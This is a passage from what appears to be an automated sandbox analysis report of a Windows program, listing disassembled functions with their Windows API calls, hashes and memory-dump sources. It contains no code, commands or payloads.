Opcode ID: dfa1af99887c39515b5808501a28f4aac3e7055a4795f2d1490624cc494d65a4
Instruction ID: 252693e16d1ae512d4658e0faba44351f4bf974f589889d2bc41d54e3a034af3
Opcode Fuzzy Hash: dfa1af99887c39515b5808501a28f4aac3e7055a4795f2d1490624cc494d65a4
Instruction Fuzzy Hash: 28218E32300720FFDE396724BC04F7E7797EBC0B60F144126F1119BAA4EA60AE528663

Function 00CC5A7F Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 00CCC91F
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00CCC934
UnhandledExceptionFilter.KERNEL32(00D0DA90), ref: 00CCC93F
GetCurrentProcess.KERNEL32(C0000409), ref: 00CCC95B
TerminateProcess.KERNEL32(00000000), ref: 00CCC962

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 143c2a5894fd0f15f349ef8f39c2f01a3d4f0be323e3bff6eca6cd2fb257aca3
Instruction ID: 6b127b574c4e166c58de0916001427630c5302c38c871f96d09da9a5dde0d5dd
Opcode Fuzzy Hash: 143c2a5894fd0f15f349ef8f39c2f01a3d4f0be323e3bff6eca6cd2fb257aca3
Instruction Fuzzy Hash: 8721DDB9814B049FD710DF25F889A483BB4BB08340F80412AF508EB3A8E7B15A81CF66

Function 00C24091 Relevance: 4.6, APIs: 3, Instructions: 72keyboardwindowCOMMON

Download Yara Rule

APIs

GetAsyncKeyState.USER32(00000011), ref: 00C240CB
GetAsyncKeyState.USER32(00000010), ref: 00C240D9
SendMessageA.USER32(00000000,00000300,00000000,00000000), ref: 00C2410B

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: AsyncState$MessageSend
String ID:
API String ID: 2137877063-0
Opcode ID: 11a26ea36cb1db9c2408c53d009d437e9df52b78bc647a6fa2d4d194df1ffecc
Instruction ID: f3be2c807d305c903d4d9296b2a9d1c44b844b7e9feac2100c440a3cdc457ed1
Opcode Fuzzy Hash: 11a26ea36cb1db9c2408c53d009d437e9df52b78bc647a6fa2d4d194df1ffecc
Instruction Fuzzy Hash: BF1108756002616FDB3C870DEC84F7E36EADBE9750F29407AE116C7850C5A18ED08612

Function 00C42189 Relevance: 4.5, APIs: 3, Instructions: 32keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000010), ref: 00C421B4
GetKeyState.USER32(00000011), ref: 00C421BD
GetKeyState.USER32(00000012), ref: 00C421C6

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: State
String ID:
API String ID: 1649606143-0
Opcode ID: 90736c2057a127e1958d73ac3dbb11814c8fd6d1f8ea77b524ebc4b7fff94c83
Instruction ID: 6111cd04917bc1c74fb18260ba6055e35db2e0c550b65f026f69c1cfe3186c96
Opcode Fuzzy Hash: 90736c2057a127e1958d73ac3dbb11814c8fd6d1f8ea77b524ebc4b7fff94c83
Instruction Fuzzy Hash: A3F0E531220259DAFF04A2508C06FAC7A59BB20780FC48061BF646B042DEA0FED186A4

Function 00C44633 Relevance: 3.1, APIs: 2, Instructions: 57windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 00C44687
PostMessageA.USER32(?,00000112,0000F060,00000000), ref: 00C446D7

Part of subcall function 00BE240F: GetWindowLongA.USER32(?,000000F0), ref: 00BE241A

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: IconicLongMessagePostWindow
String ID:
API String ID: 1855654840-0
Opcode ID: 1e2facda36d16ef9b9cfa92b196a75b9cb576930ec3e9d4bee758486ac85e3f3
Instruction ID: b77b920f1721cee80eb2552320c861e9990fa0aebd9dc7112aab10bd87b1db6a
Opcode Fuzzy Hash: 1e2facda36d16ef9b9cfa92b196a75b9cb576930ec3e9d4bee758486ac85e3f3
Instruction Fuzzy Hash: 751100B32106419BD7389B38CD8ABEA72E6FB46310F2A0B38F061C65E1D724ED108A10

Function 00C008A5 Relevance: 3.0, APIs: 2, Instructions: 37windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00C008B9
IsIconic.USER32(?), ref: 00C008CB

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: IconicVisibleWindow
String ID:
API String ID: 1797901696-0
Opcode ID: 644f3381dc7674ee1a6b65cdc13a4ccde3a22bcbb79ce329fbf1a4b7824edd1a
Instruction ID: 7f59a544f28465f4ef93a59bc6c2db1e590e747e6c52f6bae28e82e50f00af8b
Opcode Fuzzy Hash: 644f3381dc7674ee1a6b65cdc13a4ccde3a22bcbb79ce329fbf1a4b7824edd1a
Instruction Fuzzy Hash: 70F0893234155057C930163B9C04B2EB7ADFFE1B71B26433AF565935E1AE609A42C6D1

Function 00BE64AF Relevance: 3.0, APIs: 2, Instructions: 34comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00BE64DD
CoCreateInstance.OLE32(00D113EC,00000000,00000001,00CECBC0,00D3272C,-0000043C,?,?,00C03E12,00000000,?,00C6A7E6), ref: 00BE64FB

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: CreateInitializeInstance
String ID:
API String ID: 3519745914-0
Opcode ID: f7c5f21b3bdc2349857569ee1d598ea9f85fd5bc69780b2d07cac38392a3c328
Instruction ID: 07066bec2c83ad05e803cf30741eb7b9998035f2eee21fcfbe85ec3bc8012fe6
Opcode Fuzzy Hash: f7c5f21b3bdc2349857569ee1d598ea9f85fd5bc69780b2d07cac38392a3c328
Instruction Fuzzy Hash: 38F0BE72740286AFCB608F429CC8E9673E9EBB0345B2504BDE1029A040C7B2A982CA60

Function 00C04EC7 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

SetForegroundWindow.USER32(?), ref: 00C04EF4
IsIconic.USER32(?), ref: 00C04EFD

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: ForegroundIconicWindow
String ID:
API String ID: 1248896474-0
Opcode ID: cb3a1a18d52cc0fa261fe5ae43e4900a321836db54b61c5c6490a93b2898003c
Instruction ID: 57d3e40dce14b53a3a23bd24d49108ce7b30ec572817a61fc0a83e190bca86cf
Opcode Fuzzy Hash: cb3a1a18d52cc0fa261fe5ae43e4900a321836db54b61c5c6490a93b2898003c
Instruction Fuzzy Hash: C8E02B32208651AFD62467B5AC09F6F77A9EFC0B31B15026AF6258B2F0DF108C01D661

Function 00C04F6B Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 00C04F8B

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Iconic
String ID:
API String ID: 110040809-0
Opcode ID: d06f7f88c090e48de524d79ec08b00e684232a79b31a5ca0c1656fd6ed5c40d9
Instruction ID: bb53f099f2612c2b6ada9c29ec0dfd5cd5683fcc0ae87cb90dce10a39d869e3d
Opcode Fuzzy Hash: d06f7f88c090e48de524d79ec08b00e684232a79b31a5ca0c1656fd6ed5c40d9
Instruction Fuzzy Hash: D2E0DF7239C9022ED6196A38EC81F3B26D9EB84B20721063AF212C31D4DE10DC02D260

Function 061E07A0 Relevance: 1.5, Strings: 1, Instructions: 260COMMON

Download Yara Rule

Strings

Xq, xrefs: 061E07CF

Memory Dump Source

Source File: 00000000.00000002.3121874862.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e0000_1.jbxd

Similarity

API ID:
String ID: Xq
API String ID: 0-599127549
Opcode ID: f18c340f6b792b55b926c9fc94cc42fba03f9bdf5e176c00ab840029ae8f5108
Instruction ID: 7ae83f4b7055f5db027e24b4e2dc515143f7029ad941af052b0e1bff186f71ce
Opcode Fuzzy Hash: f18c340f6b792b55b926c9fc94cc42fba03f9bdf5e176c00ab840029ae8f5108
Instruction Fuzzy Hash: FC81A034B002188FEB58AF78846466E7BB3BFCC301B15882DE546E7394DF75D8428B92

Function 061E49C0 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3121874862.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e0000_1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb1531b938505a1fbca503a3e45193a3cf481653aab2345342715748e2e76d66
Instruction ID: b20aa94b1615686ab1503c871e15877995800baa8c02b187842e1c7b6c78bb5b
Opcode Fuzzy Hash: eb1531b938505a1fbca503a3e45193a3cf481653aab2345342715748e2e76d66
Instruction Fuzzy Hash: 5E917A70E00609CFDB54CFA9C9947AEBBF2BF88314F148529E415AB294EB74D885CB81

Function 035D1628 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3120835473.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_35c0000_1.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54093e43b9854a2d540d9dde3269946287902615532eb97d05431949d4969fe2
Instruction ID: 3950677450d85bcc0d1d6617ea35919334028ebdb67a467ec339daec40de3a94
Opcode Fuzzy Hash: 54093e43b9854a2d540d9dde3269946287902615532eb97d05431949d4969fe2
Instruction Fuzzy Hash: BBF01532200605AFDF65CF4CE841DAA77A9FB08620B0840A9FD099B621E221EA209B80

Function 00C14911 Relevance: 49.9, APIs: 33, Instructions: 446COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00C14950
PtInRect.USER32(?,?,?), ref: 00C14966
GetClientRect.USER32(?,?), ref: 00C14983
PtInRect.USER32(?,?,?), ref: 00C1499E
GetSystemMetrics.USER32(0000000D), ref: 00C149CA
GetSystemMetrics.USER32(0000000E), ref: 00C149D5
PtInRect.USER32(?,?,?), ref: 00C14A19

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$MetricsSystem$ClientWindow
String ID:
API String ID: 2286436557-0
Opcode ID: a1ba3b6c099c448edba5279d8f8dbff25f7d5bfcdae3f83687f192e584505c18
Instruction ID: 5c1c2727f39696f2101be673367aed9bde53a8fabca5996aaac0b1e367444348
Opcode Fuzzy Hash: a1ba3b6c099c448edba5279d8f8dbff25f7d5bfcdae3f83687f192e584505c18
Instruction Fuzzy Hash: 5BF1F671A0020EAFDF14DFE5CD84EEEBBB9AF48344F10412AE515E7250DA31EA45DB60

Function 00BEFCFA Relevance: 41.0, APIs: 27, Instructions: 457keyboardCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00BEFD01
GetParent.USER32(?), ref: 00BEFD5C
GetParent.USER32(?), ref: 00BEFD78
UpdateWindow.USER32(?), ref: 00BEFDC0
SetCursor.USER32 ref: 00BEFDE5
GetAsyncKeyState.USER32(00000012), ref: 00BEFE47
UpdateWindow.USER32(?), ref: 00BEFF4D
InflateRect.USER32(?,00000002,00000002), ref: 00BEFFAD
SetCapture.USER32(?), ref: 00BEFFB6
SetCursor.USER32(00000000), ref: 00BEFFCE
IsWindow.USER32(?), ref: 00BF006C
GetCursorPos.USER32(?), ref: 00BF00AB
ScreenToClient.USER32(?,?), ref: 00BF00B8
PtInRect.USER32(?,?,?), ref: 00BF00D4
RedrawWindow.USER32(?,00000000,00000000,00000505), ref: 00BF0148
GetParent.USER32(?), ref: 00BF0163
GetParent.USER32(?), ref: 00BF0177
RedrawWindow.USER32(?,00000000,00000000,00000505,00000000), ref: 00BF0189
RedrawWindow.USER32(?,00000000,00000000,00000505), ref: 00BF01AB
GetParent.USER32(?), ref: 00BF01B4
GetParent.USER32(?), ref: 00BF01CF
GetParent.USER32(?), ref: 00BF01DA
InvalidateRect.USER32(?,?,00000001), ref: 00BF0212
RedrawWindow.USER32(?,00000000,00000000,00000505,00000000,?,00000000), ref: 00BF034A

Part of subcall function 00BED520: InvalidateRect.USER32(?,?,00000001), ref: 00BED595
Part of subcall function 00BED520: InflateRect.USER32(?,?,?), ref: 00BED5DB
Part of subcall function 00BED520: RedrawWindow.USER32(?,?,00000000,00000401,?,?), ref: 00BED5EE

UpdateWindow.USER32(?), ref: 00BF02AA
UpdateWindow.USER32(?), ref: 00BF0309
SetCapture.USER32(?,?,00000000), ref: 00BF0314

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Window$Parent$RectRedraw$Update$Cursor$CaptureInflateInvalidate$AsyncClientH_prolog3_ScreenState
String ID:
API String ID: 991125134-0
Opcode ID: f526bc2fba2d57393ae3df89464ac7fb9cb5f0e4de1b3e72cf7bdd1102d1a08d
Instruction ID: 0df56944569f3e55801dcf5820148a9d5f9d614ef0ba4c384b4f9ce85146b527
Opcode Fuzzy Hash: f526bc2fba2d57393ae3df89464ac7fb9cb5f0e4de1b3e72cf7bdd1102d1a08d
Instruction Fuzzy Hash: 29025974A002559FCF15AF64CC88AAD7BF5FF48310F1842B9F90A9B2A6DB319844DB60

Function 00C34982 Relevance: 37.8, APIs: 25, Instructions: 260COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00C3498C
CopyImage.USER32(?,00000000,00000000,00000000,00002000), ref: 00C349CF
GetObjectA.GDI32(?,00000018,?), ref: 00C34A09
DeleteObject.GDI32(?), ref: 00C34A86
CreateCompatibleDC.GDI32(00000000), ref: 00C34AC0
GetObjectA.GDI32(?,00000018,?), ref: 00C34ADC

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Object$CompatibleCopyCreateDeleteH_prolog3_Image
String ID:
API String ID: 641560573-0
Opcode ID: a6ef81a8bc0bf8d022e011bdfe5af0d1575fd84abfffec9a04d2d302980ad7c2
Instruction ID: c429a69fe2007a2d2ddb471ef8ec124a4a869b3d29d4bbe382f744d76cd1e61f
Opcode Fuzzy Hash: a6ef81a8bc0bf8d022e011bdfe5af0d1575fd84abfffec9a04d2d302980ad7c2
Instruction Fuzzy Hash: 7CC1D071810668EFCF25AF60CC84BEDBBB5BF08301F1041EAE55AA2261DB316E94DF55

Function 00C3530E Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 278windowCOMMON

Download Yara Rule

APIs

LoadImageA.USER32(?,?,00000000,00000000,00000000,00002000), ref: 00C353F7
GetObjectA.GDI32(?,00000018,?), ref: 00C35428
DeleteObject.GDI32(?), ref: 00C35435
CreateCompatibleDC.GDI32(00000000), ref: 00C35479
GetObjectA.GDI32(?,00000018,?), ref: 00C35491
SelectObject.GDI32(?,?), ref: 00C354B7
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00C354D5
SelectObject.GDI32(?,?), ref: 00C354E8
CreateCompatibleDC.GDI32(?), ref: 00C354FE
SelectObject.GDI32(?,?), ref: 00C35513
SelectObject.GDI32(?,?), ref: 00C35522
DeleteObject.GDI32(?), ref: 00C35527
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00C35547
GetPixel.GDI32(?,?,?), ref: 00C35566
SetPixel.GDI32(?,?,?,00000000), ref: 00C3559C
SelectObject.GDI32(?,?), ref: 00C355BE
SelectObject.GDI32(?,?), ref: 00C355C6
DeleteObject.GDI32(?), ref: 00C355CB
DeleteObject.GDI32(?), ref: 00C3564D
__EH_prolog3.LIBCMT ref: 00C35315

Part of subcall function 00BE2FE9: DeleteObject.GDI32(00000000), ref: 00BE3002

Strings

, xrefs: 00C3543D

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Object$Select$Delete$CompatibleCreate$Pixel$BitmapH_prolog3ImageLoad
String ID:
API String ID: 2657855633-3916222277
Opcode ID: d7428fe1f5deaa01734c26b2ad378a2bc86e20ef31e30b7059b2505474388153
Instruction ID: d06809003a4c17c8edfc78fb2bfa5b5d1cc79c1bee36f121358dc7799636f378
Opcode Fuzzy Hash: d7428fe1f5deaa01734c26b2ad378a2bc86e20ef31e30b7059b2505474388153
Instruction Fuzzy Hash: 2CB13871910609EFCF15EFA0CC85AEDBBB5FF08301F508029F916A6261DB31AA94DF51

Function 00C329BB Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 237COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00C329C5
GetObjectA.GDI32(?,00000018,?), ref: 00C32A07
CreateCompatibleDC.GDI32(00000000), ref: 00C32A43
SelectObject.GDI32(?,?), ref: 00C32A66
_memset.LIBCMT ref: 00C32A96
GetObjectA.GDI32(?,00000054,?), ref: 00C32AB7
CreateDIBSection.GDI32(?,?,00000000,?,00000000,00000000), ref: 00C32B19
CreateCompatibleDC.GDI32(?), ref: 00C32B5E
SelectObject.GDI32(?,?), ref: 00C32B7C

Strings

(, xrefs: 00C32B12

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Object$Create$CompatibleSelect$H_prolog3_Section_memset
String ID: (
API String ID: 1904682052-3887548279
Opcode ID: 367ef1f6293549c0dbc7effc60bdf887d3e1ff3af2ca8b56639903bc690a8615
Instruction ID: 53ba1e49fbb32c1dd6991a352b371cc6fdb22eb1c2cbac0132457ef34878138c
Opcode Fuzzy Hash: 367ef1f6293549c0dbc7effc60bdf887d3e1ff3af2ca8b56639903bc690a8615
Instruction Fuzzy Hash: BAB11874900614DFDF61DF64CC85F9ABBB5FF49300F1084AAE95EA6252EB306A84DF21

Function 00BDE3CC Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BE240F: GetWindowLongA.USER32(?,000000F0), ref: 00BE241A

GetParent.USER32(?), ref: 00BDE406
SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 00BDE427
GetWindowRect.USER32(?,?), ref: 00BDE446
GetWindowLongA.USER32(00000000,000000F0), ref: 00BDE478
MonitorFromWindow.USER32(00000000,00000001), ref: 00BDE4AC
GetMonitorInfoA.USER32(00000000), ref: 00BDE4B3
CopyRect.USER32(?,?), ref: 00BDE4C7
CopyRect.USER32(?,?), ref: 00BDE4D1
GetWindowRect.USER32(00000000,?), ref: 00BDE4DA
MonitorFromWindow.USER32(00000000,00000002), ref: 00BDE4E7
GetMonitorInfoA.USER32(00000000), ref: 00BDE4EE
CopyRect.USER32(?,?), ref: 00BDE4FC

Strings

(, xrefs: 00BDE48E

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Window$Rect$Monitor$Copy$FromInfoLong$MessageParentSend
String ID: (
API String ID: 783970248-3887548279
Opcode ID: a6a3f660af5554208eb77a76f9c2e2a87579699c484e38ded827bfd0b60490a2
Instruction ID: 4b72535781f2f5c6be7489ce9aa4ae6b54e857e9efe4c7cc5d6f04c60f1ef8c7
Opcode Fuzzy Hash: a6a3f660af5554208eb77a76f9c2e2a87579699c484e38ded827bfd0b60490a2
Instruction Fuzzy Hash: DE6107B1A00229AFCB11DFA8DD88AEEBBB9FF08714F154156F515FB250D774A900CBA1

Function 00C1E7AC Relevance: 30.1, APIs: 16, Strings: 1, Instructions: 315windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BD71ED: __CxxThrowException@8.LIBCMT ref: 00BD7203
Part of subcall function 00BD71ED: __EH_prolog3.LIBCMT ref: 00BD7210

SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00C1E811
SendMessageA.USER32(?,0000100C,00000000,00000002), ref: 00C1E844
ClientToScreen.USER32(?,?), ref: 00C1E87E
ScreenToClient.USER32(?,?), ref: 00C1E896
SendMessageA.USER32(?,00001012,00000000,?), ref: 00C1E8B0
_memset.LIBCMT ref: 00C1E8EC
SendMessageA.USER32(?,00001005,00000000,00000004), ref: 00C1E91E
SendMessageA.USER32(?,0000100C,000000FF,00000002), ref: 00C1E950
